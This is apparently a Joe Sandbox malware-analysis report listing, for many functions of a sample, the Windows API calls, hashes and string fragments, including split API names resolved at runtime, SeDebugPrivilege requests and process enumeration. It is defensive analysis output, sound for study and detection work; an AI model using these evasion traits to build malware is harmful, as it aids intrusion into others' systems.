                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1abd414938b5ce665989faa68cde5959edfef2d74d7e4ff1e3c71eb97e7710cc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C951D630640705BBDB11AB64CD8AFBF7BB6AF45B04F20012EF506A6191EF69AC419B19
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(0059810C), ref: 00490481
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0049049D
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0059810C), ref: 004904B8
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 0049052F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0049054F
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0059810C), ref: 00490571
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AddressInit_thread_footerInitializeLibraryLoadProc__onexit
                                                                                                                                                                                                          • String ID: .dll$Netb$ios$neta$pi32
                                                                                                                                                                                                          • API String ID: 1978383653-4097919194
                                                                                                                                                                                                          • Opcode ID: 39bf99fd5d6cd78a678ee80769376aa58461de3a7febfbfe88c52aa785441fcf
                                                                                                                                                                                                          • Instruction ID: 21459527ff49951f05daf93ff5aeb0cc61a27a30a2da296593a39ef35cc5910a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39bf99fd5d6cd78a678ee80769376aa58461de3a7febfbfe88c52aa785441fcf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46419BB090420ADFDB10CFA8DD4979EBFF0BB19724F10826AE415A7390DBB49A44DF54
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004A03B4
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004A03D0
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000000,00000000), ref: 004A03E3
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004A0401
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004A047F
                                                                                                                                                                                                            • Part of subcall function 004A0690: _wcschr.LIBVCRUNTIME ref: 004A06FB
                                                                                                                                                                                                            • Part of subcall function 004A0690: _wcschr.LIBVCRUNTIME ref: 004A0732
                                                                                                                                                                                                            • Part of subcall function 004A0690: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004A07DE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$AllocFile_wcschr$CloseCreateFreeHandleSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1013191568-0
                                                                                                                                                                                                          • Opcode ID: f4398dc885939a87f1c59180b5c09518a1318a474fd14ba2b6e287f30e7e1cb0
                                                                                                                                                                                                          • Instruction ID: f6bacdbdc957fc5a9fe16b2a7bb7d1b17d671d9b5eddc1b40fb8306b4d774199
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4398dc885939a87f1c59180b5c09518a1318a474fd14ba2b6e287f30e7e1cb0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8341F575600208EFEB209F64DC49FEA77B8FF6A710F10046AFA05E7291DB749944DB60
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___from_strstr_to_strchr.LIBCMT ref: 0044C21A
                                                                                                                                                                                                            • Part of subcall function 00483DB0: GetProcAddress.KERNEL32 ref: 00483E2F
                                                                                                                                                                                                            • Part of subcall function 00483DB0: Process32First.KERNEL32(00000000,?), ref: 00483E54
                                                                                                                                                                                                            • Part of subcall function 00483DB0: Process32Next.KERNEL32(00000000,?), ref: 00483E7C
                                                                                                                                                                                                            • Part of subcall function 00483DB0: CloseHandle.KERNEL32(00000000), ref: 00483E83
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process32$AddressCloseFirstHandleNextProc___from_strstr_to_strchr
                                                                                                                                                                                                          • String ID: listmime$name$path$proc$reg$type$wow64
                                                                                                                                                                                                          • API String ID: 4217873175-1851501374
                                                                                                                                                                                                          • Opcode ID: 12272433b729f585193bdce10a4cbf64b8ab51b642fdefb4fd51f0ffb3b619f3
                                                                                                                                                                                                          • Instruction ID: 173a2630b8b5dfa9e6b936aa3ec7cb8159a19292642e96cda69c262f89bf9208
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12272433b729f585193bdce10a4cbf64b8ab51b642fdefb4fd51f0ffb3b619f3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EE1F8B09012149BEF64EB24CD95BEDB775AF81304F0481DEE509672C2DB789F85CB98
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0046A1FF
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0046A206
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 0046A264
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0046A2CE
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0046A2D4
                                                                                                                                                                                                          • OpenProcess.KERNEL32(0000043A,00000000,00000000), ref: 0046A2E2
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?), ref: 0046A302
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CurrentHeap$AllocateCloseHandleObjectOpenSingleWait
                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                          • API String ID: 1295659927-2896544425
                                                                                                                                                                                                          • Opcode ID: af362d12ca51ad1a4b4da40bd24647d643dd596e2fca7000bc9c6ce35382601d
                                                                                                                                                                                                          • Instruction ID: 6f20c2ddf9e607eec226d21a4c850be73cad63304627c84e4198316711b44ed4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: af362d12ca51ad1a4b4da40bd24647d643dd596e2fca7000bc9c6ce35382601d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1515C70914B0157E721AF349D06BBBB798AF96308F44472AFC45E2241FB34E994C797
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00436115
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00436127
                                                                                                                                                                                                          • CoCreateInstance.COMBASE(005648F0,00000000,00000001,00564900,?), ref: 00436164
                                                                                                                                                                                                          • CoUninitialize.COMBASE ref: 0043620F
                                                                                                                                                                                                          • CoCreateInstance.COMBASE(00564920,00000000,00000001,005648E0,?), ref: 00436243
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateInstance$InitializeUninitialize_wcsstr
                                                                                                                                                                                                          • String ID: .url$?p$LNK
                                                                                                                                                                                                          • API String ID: 2533273046-3544018273
                                                                                                                                                                                                          • Opcode ID: 82a5ef31420450d929419d106448eccaa23333d11550efcd8255a27ff2fc7492
                                                                                                                                                                                                          • Instruction ID: d3f37d63530f3a25251d587c66f2cce99b07636d1ab527733b3ada5f76862bcc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82a5ef31420450d929419d106448eccaa23333d11550efcd8255a27ff2fc7492
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43512975A00219AFCB10DF98D888FAEBBB8BF49715F114199F905EB290CB71A904CB60
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetParent.USER32(?), ref: 0049821D
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00498225
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00498263
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000411,00000000,0000002C), ref: 00498286
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000433,00000000,0000002C), ref: 00498295
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004982DB
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000433,00000000,0000002C), ref: 004982F8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$HandleModule$DesktopParentWindow
                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                          • API String ID: 3111795765-3772416878
                                                                                                                                                                                                          • Opcode ID: f3d1cc485e85a0bd6be8a46e9fdf924ff3358afce327145a664a617941d18095
                                                                                                                                                                                                          • Instruction ID: 4513cb7a96d43f8e1d4454285632cde748bd3002f6849a7d12320632e4c138d5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3d1cc485e85a0bd6be8a46e9fdf924ff3358afce327145a664a617941d18095
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E313875D01209ABDB00DFA4DD04BEEBBB5FF99318F10126AF501B6290DBB11A848F94
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00484181
                                                                                                                                                                                                          • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00484197
                                                                                                                                                                                                          • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 004841AF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Concurrency::task_continuation_context::task_continuation_context
                                                                                                                                                                                                          • String ID: $-$.$_$~
                                                                                                                                                                                                          • API String ID: 2914748677-1535613121
                                                                                                                                                                                                          • Opcode ID: 35760dffdc4fa7de238cc774249b3fd331e70eee086b4e023761f6ce5640bff6
                                                                                                                                                                                                          • Instruction ID: 10ac112a0551a7d84930f047cb1cee5c0e1a72d512ff4e08fd23859abb1faaac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35760dffdc4fa7de238cc774249b3fd331e70eee086b4e023761f6ce5640bff6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42217C31E442198EDB00EFA98C0D6FE77B06FA9300F08096FE44567282CE2C49C1D795
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00438062
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00438095
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004380A4
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004380A9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$CloseHandle$AddressEnterInit_thread_footerInitializeLeaveObjectProcSingleWait
                                                                                                                                                                                                          • String ID: Crea$oces$sA$tePr
                                                                                                                                                                                                          • API String ID: 161278594-524377044
                                                                                                                                                                                                          • Opcode ID: 3fbf7bea019f379f32c62ff8c6c1f32f524e1882701429b34ae0f07772972aac
                                                                                                                                                                                                          • Instruction ID: d0ccd7e3aac2de8c47f5c27a7e95cd3a8b4b386cea1219e15722d381bdd0137f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fbf7bea019f379f32c62ff8c6c1f32f524e1882701429b34ae0f07772972aac
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0118B35A00208ABCB10DFA9CC44BEFBBF8EF59660F155129F504B7250DB30AA84CBA0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00486C50: GetProcAddress.KERNEL32(?,?), ref: 0048732E
                                                                                                                                                                                                            • Part of subcall function 00486C50: GetProcAddress.KERNEL32(?,?), ref: 004873E2
                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00486692
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                          • String ID: InsLog$Item$erPa$labelid$xml version="1.0" encoding="UTF-8"
                                                                                                                                                                                                          • API String ID: 190572456-2764935047
                                                                                                                                                                                                          • Opcode ID: f7ac147004c2e197bc8b527109ee1ae22d58027ffb02cc7cba63ead177b1b591
                                                                                                                                                                                                          • Instruction ID: 31467695ff51873745818196bd3a6fff3c52aedbaddba9a9abc6e057d1bce80e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7ac147004c2e197bc8b527109ee1ae22d58027ffb02cc7cba63ead177b1b591
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2128FB09002198FDB64EF14C988BDEBBB4BF44304F1545EED449AB281DBB99AC5CF94
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(000003A8,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00440472
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(000003A8,00000000,?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004404DD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide
                                                                                                                                                                                                          • String ID: page2_bottom_check_group%d$page2_check_hk_%d$page2_check_hk_text_%d$page2_check_lk_%d$page2_check_lk_text_%d
                                                                                                                                                                                                          • API String ID: 626452242-169679372
                                                                                                                                                                                                          • Opcode ID: 406c1469c60aa1b0cfed930fdf73f4c3bbb80f238e5a0c5282f1cec0c4adec47
                                                                                                                                                                                                          • Instruction ID: d06ddd16359877ff06ef5ccb26d4523b776113a213bef8885153a17b03bd206d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 406c1469c60aa1b0cfed930fdf73f4c3bbb80f238e5a0c5282f1cec0c4adec47
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1D1C770901215AFEB20DB64CC8DFAABBB8EF48304F1441E9E50DA7282D775AE94CF54
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597E68), ref: 0045655E
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0045657A
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL ref: 00456595
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597E68), ref: 004566DA
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID: hh~Y$h~Y
                                                                                                                                                                                                          • API String ID: 916978925-281131063
                                                                                                                                                                                                          • Opcode ID: 4ea2316aa3b1e24c9bcabe1bc25cbcf1e9a24ee90582f10ab52e85fa5bd8347f
                                                                                                                                                                                                          • Instruction ID: 0fd103464ce6ad472cfb0f9f17efa321cc6ce69c1eee7d3c7e6b10f62d289a95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea2316aa3b1e24c9bcabe1bc25cbcf1e9a24ee90582f10ab52e85fa5bd8347f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70515B70815B88DFE720CF68D50978ABFF0FB18718F108A5ED49A97781D7B96608CB85
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597B74), ref: 0040840F
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0040842B
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597B74), ref: 00408446
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597B74), ref: 00408517
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID: ht{Y$t{Y
                                                                                                                                                                                                          • API String ID: 916978925-2285465967
